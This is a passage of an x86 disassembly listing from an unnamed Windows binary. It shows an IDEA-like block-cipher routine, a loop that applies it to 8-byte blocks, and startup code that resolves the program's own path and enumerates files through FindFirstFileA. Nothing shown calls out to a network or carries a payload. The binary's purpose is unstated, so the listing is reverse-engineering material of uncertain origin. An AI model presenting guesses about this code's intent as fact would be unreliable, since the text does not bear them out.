jmp short loc_4939BB
; ---------------------------------------------------------------------------
loc_4939A6: ; CODE XREF: sub_4936D7+280�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
loc_4939BB: ; CODE XREF: sub_4936D7+2CD�j
mov ax, [ebp+var_3A]
mov [ebp+var_3C], ax
jmp short loc_4939DA
; ---------------------------------------------------------------------------
loc_4939C5: ; CODE XREF: sub_4936D7+267�j
movzx eax, [ebp+var_28]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3C], ax
loc_4939DA: ; CODE XREF: sub_4936D7+2EC�j
mov ax, [ebp+var_20]
mov [ebp+var_C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_2C]
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
add ax, [ebp+var_28]
mov [ebp+var_20], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_493A99
movzx eax, [ebp+var_20]
and eax, 0FFFFh
mov [ebp+var_20], ax
movzx eax, [ebp+var_20]
test eax, eax
jz short loc_493A7A
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_20], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_20]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
jmp short loc_493A8F
; ---------------------------------------------------------------------------
loc_493A7A: ; CODE XREF: sub_4936D7+354�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
loc_493A8F: ; CODE XREF: sub_4936D7+3A1�j
mov ax, [ebp+var_3E]
mov [ebp+var_40], ax
jmp short loc_493AAE
; ---------------------------------------------------------------------------
loc_493A99: ; CODE XREF: sub_4936D7+33B�j
movzx eax, [ebp+var_20]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_40], ax
loc_493AAE: ; CODE XREF: sub_4936D7+3C0�j
mov ax, [ebp+var_28]
add ax, [ebp+var_20]
mov [ebp+var_28], ax
mov ax, [ebp+var_1C]
xor ax, [ebp+var_20]
mov [ebp+var_1C], ax
mov ax, [ebp+var_2C]
xor ax, [ebp+var_28]
mov [ebp+var_2C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_14]
mov [ebp+var_20], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_C]
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz loc_49377E
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_493B9A
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_493B7B
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
jmp short loc_493B90
; ---------------------------------------------------------------------------
loc_493B7B: ; CODE XREF: sub_4936D7+455�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
loc_493B90: ; CODE XREF: sub_4936D7+4A2�j
mov ax, [ebp+var_42]
mov [ebp+var_44], ax
jmp short loc_493BAF
; ---------------------------------------------------------------------------
loc_493B9A: ; CODE XREF: sub_4936D7+43C�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_44], ax
loc_493BAF: ; CODE XREF: sub_4936D7+4C1�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
test eax, eax
jz loc_493C72
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_493C53
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
jmp short loc_493C68
; ---------------------------------------------------------------------------
loc_493C53: ; CODE XREF: sub_4936D7+52D�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
loc_493C68: ; CODE XREF: sub_4936D7+57A�j
mov ax, [ebp+var_46]
mov [ebp+var_48], ax
jmp short loc_493C87
; ---------------------------------------------------------------------------
loc_493C72: ; CODE XREF: sub_4936D7+514�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_48], ax
loc_493C87: ; CODE XREF: sub_4936D7+599�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
pop ebx
leave
retn 0Ch
sub_4936D7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_493D1E
; ---------------------------------------------------------------------------
loc_493D17: ; CODE XREF: _4:00493D44�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_493D1E: ; CODE XREF: _4:00493D15�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_493D46
mov eax, [ebp-0Ch]
add eax, 68h
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4936D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_493D17
; ---------------------------------------------------------------------------
locret_493D46: ; CODE XREF: _4:00493D24�j
leave
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_493D50 proc near ; CODE XREF: sub_49A31F+1A�p
; sub_49AA34+11�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov eax, ds:dword_4A28F0
mov [ebp+var_4], eax
mov ecx, ds:dword_4A28F4
imul ecx, 18h
mov edx, ds:dword_4A28F0
add edx, ecx
mov [ebp+var_8], edx
jmp short loc_493D7F
; ---------------------------------------------------------------------------
loc_493D76: ; CODE XREF: sub_493D50:loc_493DB7�j
mov eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_4], eax
loc_493D7F: ; CODE XREF: sub_493D50+24�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_8]
jz short loc_493DB9
mov ecx, 10h
mov edi, [ebp+arg_0]
mov esi, [ebp+var_4]
xor edx, edx
mov [ebp+var_C], edx
repe cmpsb
jz short loc_493DA3
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_C], eax
loc_493DA3: ; CODE XREF: sub_493D50+49�j
mov ecx, [ebp+var_C]
mov [ebp+var_10], ecx
cmp [ebp+var_10], 0
jnz short loc_493DB7
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_493DBB
; ---------------------------------------------------------------------------
loc_493DB7: ; CODE XREF: sub_493D50+5D�j
jmp short loc_493D76
; ---------------------------------------------------------------------------
loc_493DB9: ; CODE XREF: sub_493D50+35�j
xor eax, eax
loc_493DBB: ; CODE XREF: sub_493D50+65�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_493D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_493DD0 proc near ; CODE XREF: sub_495DC0+D�p
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_170 = byte ptr -170h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004945F3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F408
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_4A28C8
call ds:dword_4A274C ; InitializeCriticalSection
mov [ebp+var_1C], 0
mov [ebp+var_20], 0
mov [ebp+var_24], 0FFFFFFFFh
mov [ebp+var_4], 0
call sub_48EE50
and eax, 0FFh
mov ds:dword_4A1B68, eax
push 400h
call sub_49935A
add esp, 4
mov [ebp+var_1AC], eax
mov eax, [ebp+var_1AC]
mov [ebp+var_1C], eax
push 0C1Ch
call sub_49935A
add esp, 4
mov [ebp+var_1B0], eax
mov ecx, [ebp+var_1B0]
mov [ebp+var_20], ecx
mov ecx, 307h
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
push 0
call ds:dword_4A2718 ; GetModuleHandleA
push eax
call ds:dword_4A2714 ; GetModuleFileNameA
mov eax, [ebp+var_20]
add eax, 0C10h
push eax
mov ecx, [ebp+var_1C]
push ecx
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
call ds:dword_4A2708 ; GetFullPathNameA
push offset aGetlongpathnam ; "GetLongPathNameA"
push offset aKernel32_0 ; "kernel32"
call ds:dword_4A2718 ; GetModuleHandleA
push eax
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_493EE2
push 400h
mov eax, [ebp+var_20]
add eax, 10h
push eax
mov ecx, [ebp+var_1C]
push ecx
call [ebp+var_2C]
jmp short loc_493F08
; ---------------------------------------------------------------------------
loc_493EE2: ; CODE XREF: sub_493DD0+FB�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_20]
add edx, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_493F08: ; CODE XREF: sub_493DD0+110�j
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4A27C8 ; CharUpperBuffA
push 5Ch
mov edx, [ebp+var_20]
add edx, 10h
push edx
call sub_48D700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
mov [ecx+0C10h], eax
mov edx, [ebp+var_20]
add edx, 10h
mov eax, [ebp+var_20]
mov ecx, [eax+0C10h]
sub ecx, edx
mov edx, [ebp+var_20]
mov [edx+0C14h], ecx
push 400h
mov eax, [ebp+var_20]
add eax, 410h
push eax
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_49F020 ; GetShortPathNameA
mov edi, [ebp+var_20]
add edi, 410h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov edx, [ebp+var_20]
add edx, 410h
push edx
call ds:dword_4A27C8 ; CharUpperBuffA
push 5Ch
mov eax, [ebp+var_20]
add eax, 410h
push eax
call sub_48D700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
add ecx, 410h
sub eax, ecx
mov edx, [ebp+var_20]
mov [edx+0C18h], eax
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_30], ecx
mov eax, [ebp+var_30]
add eax, 1
push eax
call sub_49935A
add esp, 4
mov [ebp+var_1B4], eax
mov ecx, [ebp+var_1B4]
mov ds:dword_4A290C, ecx
mov edx, [ebp+var_20]
add edx, 10h
mov edi, edx
mov edx, ds:dword_4A290C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ds:dword_4A2684
mov edx, [ecx+24h]
and edx, 2
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_28], dl
mov eax, [ebp+var_28]
and eax, 0FFh
test eax, eax
jz loc_494101
mov ecx, ds:dword_4A2684
mov edx, [ecx+2Ch]
add edx, 30h
mov [ebp+var_3C], edx
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_38], ecx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_48D700
add esp, 8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_4940A4
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov edx, [ebp+var_20]
lea eax, [edx+ecx+10h]
mov [ebp+var_34], eax
loc_4940A4: ; CODE XREF: sub_493DD0+2B6�j
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_34]
sub edx, ecx
add edx, [ebp+var_38]
cmp edx, 104h
jb short loc_4940C4
mov ecx, 0EF000004h
call sub_499342
loc_4940C4: ; CODE XREF: sub_493DD0+2E8�j
mov ecx, [ebp+var_38]
add ecx, 1
mov esi, [ebp+var_3C]
mov edi, [ebp+var_34]
add edi, 1
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4A27C8 ; CharUpperBuffA
loc_494101: ; CODE XREF: sub_493DD0+277�j
mov edx, [ebp+var_20]
mov dword ptr [edx], 0
mov eax, [ebp+var_20]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_20]
mov ds:dword_4A2908, ecx
mov edx, ds:dword_4A2684
mov eax, [edx+24h]
and eax, 1
test eax, eax
jz short loc_494140
push 1
push 1
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call sub_494610
add esp, 0Ch
loc_494140: ; CODE XREF: sub_493DD0+35B�j
push 105h
call sub_49935A
add esp, 4
mov [ebp+var_1B8], eax
mov edx, [ebp+var_1B8]
mov [ebp+var_44], edx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_48D700
add esp, 8
add eax, 1
mov [ebp+var_50], eax
mov [ebp+var_48], 0
mov ecx, ds:dword_4A2684
mov edx, [ecx+2Ch]
add edx, 71h
mov [ebp+var_4C], edx
mov edi, [ebp+var_4C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_4C]
add eax, ecx
mov [ebp+var_40], eax
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_40]
jz loc_4943DB
mov [ebp+var_48], 1
mov edx, [ebp+var_4C]
mov [ebp+var_1A0], edx
jmp short loc_4941CD
; ---------------------------------------------------------------------------
loc_4941BE: ; CODE XREF: sub_493DD0:loc_4941F8�j
mov eax, [ebp+var_1A0]
add eax, 1
mov [ebp+var_1A0], eax
loc_4941CD: ; CODE XREF: sub_493DD0+3EC�j
mov ecx, [ebp+var_1A0]
cmp ecx, [ebp+var_40]
jz short loc_4941FA
mov edx, [ebp+var_1A0]
movsx eax, byte ptr [edx]
cmp eax, 3Bh
jnz short loc_4941F8
mov ecx, [ebp+var_1A0]
mov byte ptr [ecx], 0
mov edx, [ebp+var_48]
add edx, 1
mov [ebp+var_48], edx
loc_4941F8: ; CODE XREF: sub_493DD0+414�j
jmp short loc_4941BE
; ---------------------------------------------------------------------------
loc_4941FA: ; CODE XREF: sub_493DD0+406�j
mov eax, [ebp+var_20]
add eax, 810h
mov edi, eax
mov edx, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_54]
push ecx
mov edx, [ebp+var_44]
push edx
push 104h
mov eax, [ebp+var_1C]
push eax
call ds:dword_4A2708 ; GetFullPathNameA
mov edi, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_44]
push ecx
call ds:dword_4A27C8 ; CharUpperBuffA
mov edx, [ebp+var_4C]
mov [ebp+var_58], edx
mov [ebp+var_5C], 0
jmp short loc_49426D
; ---------------------------------------------------------------------------
loc_494264: ; CODE XREF: sub_493DD0+606�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_49426D: ; CODE XREF: sub_493DD0+492�j
mov ecx, [ebp+var_5C]
cmp ecx, [ebp+var_48]
jnb loc_4943DB
mov edi, [ebp+var_58]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_19C]
push ecx
mov edx, [ebp+var_44]
push edx
call ds:dword_4A26D0 ; FindFirstFileA
mov [ebp+var_1A4], eax
cmp [ebp+var_1A4], 0FFFFFFFFh
jz loc_4943B8
loc_4942C0: ; CODE XREF: sub_493DD0+5D5�j
mov eax, [ebp+var_19C]
and eax, 10h
test eax, eax
jnz loc_49438F
mov ecx, [ebp+var_50]
push ecx
lea edx, [ebp+var_170]
push edx
call ds:dword_4A27C0 ; lstrcmpi
test eax, eax
jz loc_49438F
lea edi, [ebp+var_170]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_54]
push ecx
call ds:dword_4A27C8 ; CharUpperBuffA
mov [ebp+var_1A8], 0
mov [ebp+var_4], 1
push 0
push 1
mov edx, [ebp+var_44]
push edx
call sub_494610
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_49438F
; ---------------------------------------------------------------------------
loc_494354: ; DATA XREF: _5:0049F418�o
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1E8]
mov [ebp+var_1A8], eax
mov ecx, [ebp+var_1A8]
and ecx, 0EF000000h
xor eax, eax
cmp ecx, 0EF000000h
setz al
retn
; ---------------------------------------------------------------------------
loc_494385: ; DATA XREF: _5:0049F41C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_49438F: ; CODE XREF: sub_493DD0+4FB�j
; sub_493DD0+514�j ...
lea edx, [ebp+var_19C]
push edx
mov eax, [ebp+var_1A4]
push eax
call ds:dword_4A26D4 ; FindNextFileA
test eax, eax
jnz loc_4942C0
mov ecx, [ebp+var_1A4]
push ecx
call ds:dword_4A26CC ; FindClose
loc_4943B8: ; CODE XREF: sub_493DD0+4EA�j
; sub_493DD0+5FB�j
mov edx, [ebp+var_58]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_4943CD
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
jmp short loc_4943B8
; ---------------------------------------------------------------------------
loc_4943CD: ; CODE XREF: sub_493DD0+5F0�j
mov edx, [ebp+var_58]
add edx, 1
mov [ebp+var_58], edx
jmp loc_494264
; ---------------------------------------------------------------------------
loc_4943DB: ; CODE XREF: sub_493DD0+3D6�j
; sub_493DD0+4A3�j
mov eax, [ebp+var_44]
mov [ebp+var_1BC], eax
mov ecx, [ebp+var_1BC]
push ecx
call sub_4993DD
add esp, 4
call sub_495490
push 10040h
call sub_49935A
add esp, 4
mov [ebp+var_1C0], eax
mov edx, [ebp+var_1C0]
mov ds:dword_4A28F8, edx
push 10000h
call sub_49935A
add esp, 4
mov [ebp+var_1C4], eax
mov eax, [ebp+var_1C4]
mov ds:dword_4A28FC, eax
push 10000h
call sub_49935A
add esp, 4
mov [ebp+var_1C8], eax
mov ecx, [ebp+var_1C8]
mov ds:dword_4A2900, ecx
push 10000h
call sub_49935A
add esp, 4
mov [ebp+var_1CC], eax
mov edx, [ebp+var_1CC]
mov ds:dword_4A2904, edx
push 28h
call sub_49935A
add esp, 4
mov [ebp+var_1D0], eax
cmp [ebp+var_1D0], 0
jz short loc_4944A4
push 83h
mov ecx, [ebp+var_1D0]
call sub_49C77C
mov [ebp+var_1EC], eax
jmp short loc_4944AE
; ---------------------------------------------------------------------------
loc_4944A4: ; CODE XREF: sub_493DD0+6BA�j
mov [ebp+var_1EC], 0
loc_4944AE: ; CODE XREF: sub_493DD0+6D2�j
mov eax, [ebp+var_1EC]
mov ds:dword_4A28E4, eax
push 28h
call sub_49935A
add esp, 4
mov [ebp+var_1D4], eax
cmp [ebp+var_1D4], 0
jz short loc_4944EA
push 83h
mov ecx, [ebp+var_1D4]
call sub_49C77C
mov [ebp+var_1F0], eax
jmp short loc_4944F4
; ---------------------------------------------------------------------------
loc_4944EA: ; CODE XREF: sub_493DD0+700�j
mov [ebp+var_1F0], 0
loc_4944F4: ; CODE XREF: sub_493DD0+718�j
mov ecx, [ebp+var_1F0]
mov ds:dword_4A28E8, ecx
push 28h
call sub_49935A
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0
jz short loc_494531
push 83h
mov ecx, [ebp+var_1D8]
call sub_49C77C
mov [ebp+var_1F4], eax
jmp short loc_49453B
; ---------------------------------------------------------------------------
loc_494531: ; CODE XREF: sub_493DD0+747�j
mov [ebp+var_1F4], 0
loc_49453B: ; CODE XREF: sub_493DD0+75F�j
mov edx, [ebp+var_1F4]
mov ds:dword_4A28E0, edx
push 28h
call sub_49935A
add esp, 4
mov [ebp+var_1DC], eax
cmp [ebp+var_1DC], 0
jz short loc_494578
push 83h
mov ecx, [ebp+var_1DC]
call sub_49C77C
mov [ebp+var_1F8], eax
jmp short loc_494582
; ---------------------------------------------------------------------------
loc_494578: ; CODE XREF: sub_493DD0+78E�j
mov [ebp+var_1F8], 0
loc_494582: ; CODE XREF: sub_493DD0+7A6�j
mov eax, [ebp+var_1F8]
mov ds:dword_4A28EC, eax
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_4945A2
jmp short loc_4945F3
sub_493DD0 endp
; =============== S U B R O U T I N E =======================================
sub_4945A2 proc near ; CODE XREF: sub_493DD0+7CB�p
; DATA XREF: _5:0049F410�o
mov ecx, [ebp-1Ch]
mov [ebp-1E0h], ecx
mov edx, [ebp-1E0h]
push edx
call sub_4993DD
add esp, 4
cmp dword ptr [ebp-20h], 0
jz short loc_4945E2
mov ds:dword_4A2908, 0
mov eax, [ebp-20h]
mov [ebp-1E4h], eax
mov ecx, [ebp-1E4h]
push ecx
call sub_4993DD
add esp, 4
loc_4945E2: ; CODE XREF: sub_4945A2+1C�j
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short locret_4945F2
mov edx, [ebp-24h]
push edx
call ds:dword_4A26A4 ; CloseHandle
locret_4945F2: ; CODE XREF: sub_4945A2+44�j
retn
sub_4945A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_493DD0
loc_4945F3: ; CODE XREF: sub_493DD0+7D0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_493DD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_494610 proc near ; CODE XREF: sub_493DD0+368�p
; sub_493DD0+573�p
var_308 = dword ptr -308h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_C4 = byte ptr -0C4h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A0 = byte ptr -0A0h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
